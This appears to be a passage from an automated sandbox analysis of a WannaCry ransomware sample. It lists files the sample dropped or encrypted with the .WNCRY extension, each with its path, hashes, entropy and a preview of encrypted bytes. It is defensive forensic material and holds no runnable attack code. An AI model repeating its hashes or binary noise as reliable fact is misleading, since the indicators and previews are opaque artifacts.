                                Preview:WANACRY!....QL..zrl[P..pA.j;>K.w.Z..p...\..p".]...w....LEC.) .].:9 ..v.h...h...H...6{@Q!K..^.."E.j..>........c.gN7..u.....-....UXpm.f~l=.....w..O.~...AJPX..^..j).#..$r7G2. }........~........}..9!.J. ...............5.\$.D...(.Z.@..n...&++u......_k..$.u....Th........]O.Q.....c..OI.c.,2.V....'9..9..,Jx..N.}...@4..P-..h[0...5.uw.T...."QD..G^y...o..r6n..F....5a.....&f...Y.o7.h.Q7$'.t...-s..h.A.U{w..w,.$=R.;..X.......g........U.....|yl...2..I.E.?`B.....4.Z3.6.b.../R.4...'1...2!.w..X5#3C.i.h..........?.2"..I.7w..B..n.;f:.....Z..a2?..&...>T........ZV_.e*T....c......\....4-+.\..N&.[...i..........5.a.D7.u@/....g9....".~../g...,.6;..."....|(L..m8..9b^..9....{.......x.....kz.fr....j.C.Hv...G...?.l6,1.e.......n..n.Zw.x..5..Y!&.M2<.\.....+...[](/..=.*......,...J...d..+*....V......*..m,....^4v...T"[.1..L>..Z.Rl0.Z....~.|t.W.......z.X.:.]....x.R.}.r..{N....79.%..*<...D.\.]t..f..v.;....i.Z.....J..S...@cZFN.......*.u']...1......W..:...J..G+j{...G..U...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\us_tv_and_film.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):164584
                                Entropy (8bit):7.998933938468432
                                Encrypted:true
                                SSDEEP:3072:Mpri4hJ40D96qjEYiccceykh5enL1R4S5QIEhBzg92CzdCeY24N:Mpth8qFpiun83Onzkee
                                MD5:581BF5411DCBBE80ECB5A0AC5317792E
                                SHA1:4B3A6F4B682DC24A869B6D7AA2ED1D2E08C83F1D
                                SHA-256:C3B5470507A82C602C06CA913508E06B05F4F7F95739A35CDC78AA5336A373A5
                                SHA-512:25ED5F14693D9412F3CD8C24C6A2EA0FF02BFDB98275348645D3806672F387F8C1B83E0AA9F953B6CAEE8AC823407D0D1C9B9E918FE3D56FE60B4CF25095B753
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......p...L..ZS.R..1.px.u...u.....s[a..r.f/..o.".z.x.Y{.SK.[..z...G.1.zA....|..k.9.V.+x..J..@~..UhW0A.<.'..L.......Y@......@O..3...\K..E.i.p)BGR.i.QD....L.C^..N..J.E....C..*...?zp....Dv.......s..kK..&..t..Ao...)......]..s....Oyx...5[.f~............gu...K.{.5z . ..?..v>/?.Mu~......<c...Q2hP./..ZLax.)9lns.6...{O.T/..?.j:......hs......i...w..'.Q-.4R..R......9.n...R..~.u..qT..8.z.....q...a.z......%.3C.>ax..Fw.$.*..8?....\Y.t.[bS7p.cq..;=....@..._.a-&...!....v0.<W............yK.+...00..e7..?1U|...0.Z...o.i.....Y^<......GP...e....U..?E}.)h..^B..........g@....!...d0W...n@.^.F..DV........P...........M.Q.7.:./>.si.X."..c.;....+.u........e..N... .8....zO.c.....=...(E.Pa.. ._L..R^....r_..m4S...%..n).t........3......G.......v.=......p.2..'...x..M$...z.o.M....-.?`.)..[weQ.*.C.i.....y..r.....KN..z..x...m] .V.Ohe9.|..?w.......5..zE.z.|E....c<@...R.....o...9..!..".....Eq....o.L.......-={..%L.P....:..h.L...._.31...B/.X...D.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):24904
                                Entropy (8bit):7.991995403764266
                                Encrypted:true
                                SSDEEP:768:QW8F9ZP+1WNaslWRk4tjuX4RvWXoLQk7ac:QsWNasEtjuX4pM4
                                MD5:E77D6A2A97C62693C0429839DD5D0139
                                SHA1:08EA962F59FB43239094301BC7F4998FF4E29D20
                                SHA-256:0D3B4403EB61F7BBADA12A422A06E37D550F79B92CA290C039AC164FDFE6B0A9
                                SHA-512:D498F6FC0DE6A4680D92D861106EC4167926F2C5FE6C9BE4973BE2537BBA43776A32DDAE4FDBCEA840019E2536F722B39C2B1D9379FA079F09EC3B37A71B6B07
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....~....?.Q(o.?..'m.z.'..1...nq~....V"!s.Y....w....~9.]6...;.qRek^..;.A.2.H..()..1z.....>j+....B.X_~...x]7kV..[@..(.....].....Q.l.....\....Fz=..`....f.]7.r..#.a....RV..}...>......uy....9q[.q.7..?xe^_..2+..KH=*.c...g..=.7k..+x#:-..7.5..bF...y...5...../`......=.a(m.Db...}%!!.#.+.ay.z..F(..97.....N.......jH...:0..k(K....oX&].A..!......Z...\....".U;.3.....MD..^...o<.8h..WS......L.P6%1.a0...O...........8....G...f..vro. ...F..q.R...s....2tF.....3'.x.n.{.....LD....7..../l...[+|,....1L...,.$.........&.....&+..........%,)h.,..s..g..3.1.@..g..R.......}.>..:..B...d.....k....h..l.p.uC.h....G...z,^?..n.. ...,[#y]......8........y`....L...N...WF:P:N......@M-..p.._Y...m.FQ.9.J.....H3.3J..w.M.t.8........@.yB/.y.T....vN.az....J.&.jP.}h2yL<.m.HH.;..].@...r..{q.y.9...tv.'.B.MJ.............yE6.%z..tr..\uN..."9..@E.&&....0m.=.O.S .K.......e.WZ^[.F.....G..A......q.1U.....^O..[!..C.U...s..7..Z...hMHwM..m..UW\.....p ...w..[7X.:?.1.^...P...<..=%.=#....Q}..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):690472
                                Entropy (8bit):7.999754963596077
                                Encrypted:true
                                SSDEEP:12288:Xh1WaQ3nKUzE7VURHSt9onT/7BmE7+jt3Ng7qywf78sjcc/+/GhP+tPCSS:XfenKUsIyt2nT97oUWyo78EFGehP0PC5
                                MD5:C275AC12AAAD7F98FF27C16A300FE0A6
                                SHA1:6805ED86082F1D95E9738D2844C158E34627E411
                                SHA-256:B708D433FEFD3F67CA722D2E3A43EC61018F56EDD39EE87C6A8F47FAF41EF806
                                SHA-512:2776DCE703F2E5970860B77D4582F265E0612E55966964A24E25B6B846C85CEFEA783C1B2E79495D71EA1EA150DB26314A8C156CB8CC9796A8184611E1971E32
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......^1U.....d]...y.6w./.q....sn0.<7%..8.~.....7E..p..m.....x....Lx7T.+.I.m....fE....;..=.^...cF...._....O#K|z.`E2.....c....f..../......$U..C.#qFeL...!3-.D....s..A.&.h..^...b...H...u>.p...I>T.}.kU..u.>.=...T.g...........CF..2..)s(.....v...:?Z..z..K................!...?.t.....nT.h.....E....7.c...P...A........mj&...2t.Y..pZ.....n.....7.......6.... ........?/,.O:..|..x`...8..I.h........{...l{..m[................fq....J...X..1..].G.g....uQ..%..d..........a....fj...G....../.8.hB!.yS....#..P..}}<..~l%.7..3l....x.VX>.....j.Q....5U..!..&r...../...=G...:r....>}"[.5...'.Y2..I.d.zK....|~..z.....N...b;^.m/.'x..p...=(;...r2..3o,a..K.j.....g.@v......|.$V...p..|.Z.W.......9..&..gXt...~..~o.b<...5&8*.2....~YN7.....{.tx..$I.t.......`dUF^....C.mY.%.N.k.`...Y..m....6...M.ch..3.{.1.Bg.$....%......._. .2......>. .S4.A..+..".0.+...w[...n....6.....P....Psr._t3.K..*`..... .\M+...~..N.<>....(....n$.....'9k..*.8....Z..U..3./....V|.......0...%%

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\Flighting\FlightingLogging.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1816
                                Entropy (8bit):7.8893863653748175
                                Encrypted:false
                                SSDEEP:48:bktlYHHLjRAQ/MLBxrJ1QNjhHOXRXjYijF7LS1xg:o0HBAQ/kt1QFhHoXjHF7O1xg
                                MD5:C83752E071865B62A7F8404DE8BBCA3B
                                SHA1:D16ED73982690F257F09829728A14F697DEAEE71
                                SHA-256:05A89006B47105E4B1711863E6656FAF89E63B0C3B4D7CD5A50D4500C49C7CDC
                                SHA-512:909C7B293FCA8234FFAEF19AF9D80BC08D66AAF6944169DA61ACCC6C10DCAA957B97DBE64FF9DD7A22DA0CE93C757AD72D1AFD95409D70685502B15980D284E2
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....N...;.(b. mI....O..a....(GO.Fn..~.|......$C,..Nk.#....K.>..}O......K....p.........&.(}.t....:..x.5aI....5..<&......'...:.D.!.....I9.1_.....c..:..W......">F1hR..C.#....N.....N....~aT..7.$<....I.7Utz.0./.Z2Jp...j.f.Z....2.%..9..M&... .p.....................Fd.g.=g...}1.~y...,.P6._..NU("w]..C4....W..90~...\.....a.3.1....4.:4"...)......c[.*......sf.x....X<..iY.U.".M.>.....)...Tc\.....*.j....Q..xN....H..l......cY..l.Ch...j?;.P...#M3.(..YM...}.W.U.....3..............-....Y.9g..o...5.K\....&.b..lV......jHyW.F.4jIP3*....j.......p.>fI.}...dgS.....Ed..fM....\.J~...lQ.p...#m....j..G.=...A.?k..t.hc.U.e/k....)..H3..o...9.8..A..,.^.-:.>.2..F.m).{.d..g._,...G.-.$;.2u?.....}.Q..j/....0z.G.3....a....y|...6- 2...l....o.,L>F......1j.Pt..7./..OV...x9.e.R.....UYX........wv...bSpyA..T....R...{ 8dc8.b.E.L.b.^i"1..Y......Z..x<......4...s...B....O..<)[x8mV..'(.......%........v.lW\^..l_H..a...fcyW..g..&.6.EI....&..S.ffJKf../y?.....X.e...7J0.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994707584058.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.998670002128212
                                Encrypted:true
                                SSDEEP:3072:vI31M64G72soF8dgIW9wIYU5w73/1DQGg:vI66F7ZdgT9PA/JJg
                                MD5:1874F47A8FEE610C0467190E67DBE79F
                                SHA1:2256FAB3FC2D076B31CE4682EA42D595ADA72680
                                SHA-256:1D3049F2C86EFE2F5AA2542D6C759D0E71F7C722B38DB704AAE1FEFC1A35DBDF
                                SHA-512:E0F095C6A72A06C4EF87CD57FA039A56ECE46FBE07C477004E38C2B0B71EF93350BF0C3B89CE0C5B1ADF01E083203C485E24E3A8DC065E058D229D6112D0B2A5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........%r.c=Y;~. .zr....)..#q..-'.. L].h.....y>..<H.L= ZG.V.....E.;.4L..p.FD...."....q2..Z.-+L..^.......}..v..w...r..U.I.p...K../b................\.;..v...I.N..C..b...A64...#h.. ..7.c.{....h.....^........i5.=.bN..s...t.3..._.A....T.y.@...&..\g.....j.......N...."....&].....s..s.X[J...%x9..DJ..x...)t.....'.....GI..6..7.......'.]5.i.I....&(...`...B....6..80..J.,.u.[..V,..dz&T....8...S.....D%..M.h.cg...P.P,...+.9.../..Y(..\..z..!...c..e...w....s.1.E..t.zo._...+.g.^....EN..''aP.&._\9....3.T....3..M.S.N...D=.]..B...{.......2...@. .5pT^...kae..PZ....p._... ..1I....O..;.o-...h..._..*...I..Nt.......2x..@.2..l....>.~.T..7u....g.v?Z.....N.B..... .n.@..+..R$..%.G...w..:..w...Z..Xp_v.....jI.:...S^.b.....g....o....i...JO.(.MzJb=h....1......j "..4.?0.k..AR\.`:..9T....u.].sz.L.P7....F.....Z.(_~.)..Y..y.e.......G"b.5+gu6.x'..f...z.Y.l.f`...<q..{_..!*w...?9a..P....H.T..;Xm..~...]N.{.7r.%.X.5j..._;R].'D4......RTH.S[.-E..?K.1....+O.......D...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132900994802498611.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):115848
                                Entropy (8bit):7.9982652359642055
                                Encrypted:true
                                SSDEEP:3072:L0soBbw6edHW9sltkceFDYFlWDJy9QY7g2eJLcrKJt01Qof8l:LZi0R9kcCYmI9Q2eJLcktoc
                                MD5:42E33FE2EFCA4B88C6EF5EEBE2A24AAB
                                SHA1:39E495B891FFFE7F3946A38CBE3EB526B4B347B7
                                SHA-256:CF682CD928AA0BEE607467D0F4F4E2AFBAE85C56C986FBA5237990D5E94B5133
                                SHA-512:FA46CACB0195EFD14BB0A11114C191CB8F63D65D50737EE7FDE85E23F94A26D31EC4E88BAB915EF0F39F8C12080948EC34F9E7ADCB20965362C70F97C223226F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!........~.Z..-....{..9..d.a........Z....r.3O..6.2"....z-Cq...b.o"F|..-._.2.e%.......P...@.U....d....T.7....>`v..!`..Is"....r@.'O.(.C.....x..{..~{].cYud.6..#W...(......zO..{l..mT...5...G.8.@....q.F.......x.C.....aE...+.Bx:...5w....~.s.f.J....S...&....j.......h.b.M...Fg.Qr..O.7.J..'E...C...Qk.9.%5{MI.k....h.h..1..3...x.c:P.9.....!.FjOI.^`..b.m.o8..'...c..p.....s.R_D.8.G$.R.....sY./..z..A)9{.p....(..6o'...sR.f.HSY.,....^..U1......U".P...q4. ..l.....I...!_...#.[.Ol...7q...U.eiS......9MQI...2n..?I..b.....UC^<@.W6.......I...46m~....sJ.q.#..q.......VK...s..9.(.S...\.w.zj-......."_...kwP..@....m.. ...iz..3.....D..6..:.......%m.w..z......*oP<.h.`.4.M... b....G.._...L....n...M`N..5.{9;......Q8,.xS..q...u.......&4....B.n.,.g6.w.O8..T.d.wB...6.......M...8].+g......*]zi^'.F....wyy...(..(RQV.*..N .i{..."D.8..Wn..u2..9...y...n={.......L3.....<..:z....vP.+....0.!..;.S.?....y/.....3...B.#s....N.?.onK.......RyA.-..2.8.C..W.q.)......22.mr,?..4.{..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551589314323.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998126600039099
                                Encrypted:true
                                SSDEEP:3072:JjZcYM49fG0A6+AMpTfAzDh6ekxFM9U2cFsTHO:7cYM0X92wf8FMU2cFs6
                                MD5:F67034C9A704B69876DA4A5B39DD0170
                                SHA1:71E1868C83D677CC847A1422659A7208966AA728
                                SHA-256:8C61A7BF9C58D9ACC26428885311CA3D4A6AD6366AB93A20EDABCE01A1969D42
                                SHA-512:5EAB6385D464BDA7AA7530EA4887AFC32642A31436BBBE4114C97CBA23EF3E9679ADFA77ED33E033B0D08FC1CF9C00A12D0B5394C40AF6C3D0C1144DDAF73B8A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......-L..<.w.q.......j3..C[.|....H...%...K/".*..w...].3..0..A..k..D.z...dI........z|.......`........j).}....m.S...'ZhI......:.|&o..)....U.\c.)..^A...W..C.}+...*s...M.....E..Y.q......aL...@..j.....O..|.Nd.Wnd.#.E.f..N..}..8.M.G'.x...o`...P#...O..............J..65.-]X..?f; ....uV."....W..='W).\.`D+l....bWQ......R...?...8......L*..zD.2.~..!."9.+a"69...r..Z.o..^..J>.....f3.(..}}...i.X..../.).......D..H.[........6{HO.Y...B/..3.(..{.^.3w..+..C.h...vg...7y8D0_.O.R.p.....v.{}....C.i..5.Q..l`.R...x.i..;'.w8...........Y.uy.3Z.Ydg<..........;a;.&,.....J.....m.i....eV.3.&vysX.K.q...."..]).1.......8.h..J..\..3...k.Lm..6..]....&...F..I.@^...f.P..<...O.....U/.'R-.)....gBL..Guj..[.. ..i/.....H....N..X...@Y....}...cfX...Z..uUs....z.....E..s1L...4..#)F/a...W......Qy..\~....nIiG....E).MJ.!*6...,I0..R..q.v...yH.....E.......R)...5...Q...sG.%.C...p~.....`.4....wR.1...G...N.;F..<..*...EB.|j.?......]K.5.........f.<.<.q$.....;J..i.@G...A..A.x#.l...(y..T.M

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133196551879309585.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):111896
                                Entropy (8bit):7.998502424640496
                                Encrypted:true
                                SSDEEP:1536:SkwxvndN11rj0cIa2T9KCfMfB6V19BZAf3q3gvaJ7D8oXPm+1gVXeXlmNWf1I1uX:SkyXIS2mB6L9ByWJ7DO+1gmlAY1+PgYk
                                MD5:4008F016AA1BE190FA1A788516C2C7E3
                                SHA1:E30B98E19EA91137FCEBF8D8C3046D80114325B1
                                SHA-256:9B66F2B460A2E874A34CA11A3139AD8C9CF458CBC10EF98C17C0322C06DEAB56
                                SHA-512:05B55F9CC7013372E6CE23D12E7C51EEB48A7F87A9495B9985E04C15E08C21F1754F8D77235BBF6290C2EEC686EAD42DD7BBE266E667D5DBB433D630591D3D47
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......i...I....+....hkR<.('#...8h!]..Y..z.D.B..F...=..W.vM.........Zc....D..^.X.Y.<.yb...C..~....b%R..f...$.e+[^w;....}..Q........q+6G#.d..V...&../.../.o.yc.44.e)r3.s..*F.....f.(.....~.6E..F`.|.....I.....g..&..6j 1...G.....fE...o..,ROf'L.............dG...U.\;.d..T...`..u$...\.dF.W..^$...Lz..JU.....+L#..xh.1U..X.b..}T/:G.............8.?.......-..<........[...u.....9'...A.D.A..Z}^VF.g.KuW.....1...5[..Q..o........0..>..A....{$...t.,V8#.@......G.|....vH..7$...l.m,.l.tTzK..s...R.Z.r...,T.....6...sU.0..d.a....F5.;..r..$f.i.p..i.kk......s..Bv..d.k.Q..U.l...i...._......q.......M(.~VZ.1..dJ..T...B..V....H.........Huy,D.J#.t.S.....(~.SF$.|..K..>t.......k..u..A....G`''......._s.t.x..`.i3..1~.!/..|`=.`.......mb.c..~Y...3...s.O.[!.v./#.^..L.....s|.wa....S$.....~..OlP..2.=..)p.|'g..#..u.7..He.FD..C.....[g.Qp.U..;FK*..[.....\.Pj#&.3.1.6.`.0.d3...\^.$..pr6.1./F....F:....B..@.....t...s......._....QG...Z........q.._LK....'.....vn z"

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210922101724.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):364408
                                Entropy (8bit):7.9995417060615415
                                Encrypted:true
                                SSDEEP:6144:U430UbuMaCLGPg5epCBtL4WHM+sKvdiJd3iJNWYdzn110gX0qMkdK14HgDICskHF:UM0w5m0tMWFsdD5YdDjj/M6KGHgDIkSc
                                MD5:E5E298F1AB7346CDC09D3621748E42CA
                                SHA1:71501D3B2885E78A2163384279C3D5C5FAD4B47E
                                SHA-256:869E9AB08BE9478D0568D8F8FB6F9098030F15FFAF224602FDD6D7B716743ED0
                                SHA-512:0A3F4088E8AF6AA2019E5A2C1FB0DBEB5EFD498804E203D5424984EC90FBEFB0F71BC6F0C550A7F757A442E6CC0278D4E041C1673F4BB0D1043487829DC7825C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......L..%. S..!..E...u..*.t3...cL.~....9@^.._j.{LQ._..C~V..3.~...Xn..hS...+....v.(...X..3...c.u..4.z..~A4.&.p.n!.x`[.;Am...=.........hfgp.m~...F.....z....&SU..m.......T....3m.v....#q.dB.]vO.M.^k.].-J....s.P)....NN7B/.O....Tg%#....8\....s....n.0....X............. 7.#.-3.Tq.!)..*....5..W@TjC..f.~Cb..(O.,U.f....%e..T........f.@>..E...Q..:......C.M.J..wN....5-n........QC.3.k".}.-.:./j..5t.Tf5...,?)......B.N5..)..... 9{....P.7..0x.E.`.@.s3..{...z._x.....A).t/y..#. ..`......Y.~....B....h..;.P.f....D. Z$z..../.....HZ.p%....!..^..V<&......M.......lvjry.a..O...05..e.Z%.j_..L~.k...gyX.3W.$sFH.4B...;[0...+RKlh.P.9.~..m.......p.;+N..e]..)%......V.V.1.dvs`Qg.=>9....m|........ ;y.J...P.2.h...S...?QNUp..~- ..;.Q6.....$1..Q4...o...=.zo..q._.:......@.5qG..>][.~.Y..H..A9...Ek..1...2...H^......R".B......R...X.P.K.i..[MV....+..<..~..8....o*S...... ..Y...F....C.k\.:..7.o..{...7.r.S?`L$.z..s.tMz...".@Zt[.."..'<...l.....l...7..;......2........J@.S%aP...urrL:6.=g

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20210930121453.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246312
                                Entropy (8bit):7.999330414347671
                                Encrypted:true
                                SSDEEP:6144:hosEl9iqIE6G+uAooZl/YqHcztbnMrzShN/ZfjWOdcrUQuOdc:BgrJgxV8VMrwbfCjrU6c
                                MD5:C9B509D139422FB08EBF8FB8E8A59E49
                                SHA1:71D8E3C59A2B5891AF0D3EC5003B2836F12924DA
                                SHA-256:825A5C935325026A40F948D6315B6C7892C4DA08E3EACBA94D14EC1F3B7BB14F
                                SHA-512:C8EA366C2549E6F4705537DC7E6244DC0F6614FC6FE464233A8C2DEB2D0467AFE2E5FD065548BEB55413BAC299548479A3F18BA99BFAFBCA0FA065065B34A329
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......f....].......@../%.B ....d..dR....kZ;u.s..l..u9.#x.q.pR...Vm....[..&Fh...Mj..|p.............m..O..O....yO.}.B.B.5.eA.....L...$&........`..".~.].Rz.s...>?>..(>l.RJ.K<.K8HQ...@q..lP/.d....R....y...*~.$....27~.^[.-.......N.....BZ.%..;.KP.g..^...w.\..kK............H.z..J1.......n...u......a...._.......B.%$........;.m.......8@...ni..Y..!...B...gL.C.....;..;.$\..x.|J.8 ....SQ .V-|...93'...W.Y2...n<.m..~f......3...5T..f'..W..5.Q[ c.C.j..d......g..Q.,.>A?......L4...y..>..X...#...@..r..{.t.A...j8...*_.W'..:6.IN..o"$Ju."..L..*.{...E.T.....(.."....b....E..}..Z..4...~+...Y.O.Q.k.N...0.0_ G.....R..t.(b_*7SI.8..n..].$....#...>:W~.....3]..K\W...|I..WZ......{.h..k..........z.h..}.U.%.h[O....Dk.o...9pc...A..pG.. &~.?...yQ[:.y.[.)...p.-...'...7j.^+?J....N....h..4.o...Z.E..+.4KB.O.....M.......b...F..o......./..8..v2f..R'...#p..........\....,...q.-...T..F.m.s...t.j..nA.W..K.yQ..v%d...=li.......S.{vq..5...f.a$..../..=@..ZA..?...Q....1zQe\...hX....!...

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220120085256.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):273704
                                Entropy (8bit):7.999288419867323
                                Encrypted:true
                                SSDEEP:6144:b3NuIFLpqwg/2zKyIc/Czuf7hZ9ieSv22oPvdZBSiN81uY3U5Se:boIpp74yCzujb9ile2oPv1Si+1uY3de
                                MD5:89E3520491ED4A58058B49AC3FCDC7B2
                                SHA1:E9597A0ECC49369F865E57CDBA9801D8749F7782
                                SHA-256:B79E102C31D31032115DA799E73EF2047C97088E341ED4AADA3E9D2400F02437
                                SHA-512:C219B4B24B23073728CB8E53DAAFDC078A13DD47692A92E7984BB7B7775AB027E537A1C4C207E120027A823E31430EF7465801A2687305F17D5DBC88FCCB36A5
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....vy];.1...sb.Q/i.Y..(.?.....0....N..KR.D6.I....@....*.-\.M.x.....k@..S.))M.H."..pm......m.....{1+..'Lc......g..qQ6h.hS....9..m.y.A.E...#T......./`hr..0c7.....gDJ..P..I+.l....q,DI.....M...w^ *.K&>.3.V8.....Y_............W.....J|..w.(._..tD......nJ.....,......$.......]F......wQ.1.Eg%Am...~Q+...?.)W...,n_..u.E..4R...xY.....<Js....J.~.Z.&..IbUE.._".Od.^..p.V.%...(,...E.......W=.,..A..9..=B...k.R.BY....;. &.).b.K(..<9..q$....F...(.,..2....1Q.v]y....D@...d..,...........&.K...==........7pS....g.c1....+..B....B.$Q..\.o...i.....a.)Z...6.b....I!{.99....Q..F8..j.G.UoVU..C.n.k.......X.9.F.R.K....Xvd.5.>.~Ul?...U.F...#....\m>d\...e...7..7@b....R....$..p..Y....a.n...:.....%.o.!..h .VY..t|D$S...V...C.B...My.....,.#...K....>.....|..P.[.......P`".2.M..UN.i._.s7C.|.g...A..5}....J....T{.....h!...9.1..1.!..gb.%c..s9"....t).`..../|.O...5.d.E..]..h.rX.L.~|O.o?`...e....9op.r.7..O.#Fk..42...i...!...5hQ...jZ[_.*E?.....h1{...x..fG`.....0.(O#M...7.W|8(#H

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalState\DiagOutputDir\XboxGamingOverlayTraces_20220223140416.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):246824
                                Entropy (8bit):7.999227852254764
                                Encrypted:true
                                SSDEEP:6144:6k1CHEezLw42KVDPP1OsRLQDYYdggEVGSkR3gZsBq/n7sc5EHOr:6kGTXx0YLwYaEdkR3gSBWsc5rr
                                MD5:8876F29EAA76A41DD11ACD91D5BBBD15
                                SHA1:06050170100D27F6CCBC84CDE5E820E8D95554CE
                                SHA-256:74D9E3364080F41F16AA2157292FCF81AD2103585007976E311DB8200B6EF852
                                SHA-512:429A57C5FF4536B88A911FE901EBE8453D281387DC0310087611FC98E64061E71D919917D6225AD99C440D921D9670252015562DBCC6750464E53316CA6B8F08
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....mw.. .....wC*'..}...../....Z].W.a..6..8..i-..*..`^*.>X.4_..........7..,.xx....|2...*.s..w.U...G8...?...%0.)....@.R....4.n..0..f.....,m;D.A.((......&.!V.@.h.p.YR4.:.7X.14e..i...5..O.W..".PK..` . O!....@F.S..{..\e..C.x.FI...}...6.3q....S.....v....>..................0.Y.............Q'.5g.2<.m...o..uU..Tc.\Bl..F..3..s..y...).b?..;..haL./u.PT./.uBem...}k.d|....1n{cJ....H...cy/..U.G...RF[.e..M.....s..z..}...s_}...=.zS..1s?.?.....G.@.g.....*.G..L;|...BD...*.".}i.6..0.v.Z..._.............p......j.....A.I..!.9........_.;.=..K.z...mx.o.5.cKXm..s...%.....!Q-....<L."d.%......a.+.....N.R..Bd@X..=h..".W.Q....`P|;@.Q.......S3 .Z;x.J.!..Wo...!.#......g.(N..@...g.W.&!..\.......:Q6v..=..[.....e..F.....k.....q..SV..cu...y.!.....,.c....3..H,.~.....H....E2C 4W6...X.,f..j.C...n...Xr...#...S.o...U..c.>..5......c.}=....Y..ax%..)%G..8.>....XiQA..f..Cu[a..H.#.{i..k{.......q.M.~......{...(..B.......F..Z......b.a..e....C.%B..vWju.@..ux...D....... ..Y..:j...^.Z&.[;.

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\LocalState\DiagOutputDir\OneConnect.DiscoveryNotificationTask08_18_15_03_36_7371.txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1576
                                Entropy (8bit):7.866416685064381
                                Encrypted:false
                                SSDEEP:48:bkj2PbGaQUjDYtnZtyd8Uv9AGeDSxX1r4O:oj2zG1Zt6AW
                                MD5:DBBA3A204CC8F0CFFE48D0B6528C19D0
                                SHA1:5C4C6A1A8B2A0B269EB26C12B03381F9A042F430
                                SHA-256:D5AC3046D3540989CC736690F8009DC58731B03F818D43C06A55A413BEDF0407
                                SHA-512:46AE0BEF62B9597EF86B356B46FE0D8DE4B7374FF9EF97B445E2DDF18D62F19540CC847938E0A1D60765B7B66B38D4D848088B49F1288C2E5DC62B8E511FD2EC
                                Malicious:false
                                Reputation:unknown
